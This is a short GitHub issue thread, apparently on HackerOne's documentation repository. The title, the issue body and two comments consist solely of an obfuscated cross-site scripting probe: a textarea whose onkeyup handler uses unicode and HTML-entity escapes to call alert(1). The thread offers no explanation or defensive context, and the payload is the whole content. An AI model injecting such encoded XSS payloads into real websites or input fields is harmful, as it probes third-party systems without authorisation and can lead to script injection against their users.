### ISSUE TITLE
<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>

### ISSUE THREAD

**Issue by blackfly06** [Hacker0x01/docs.hackerone.com#305]
<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>

**Comment by blackfly06** [comment]
<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>

**Comment by Mohammad-brj** [comment]
> <textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
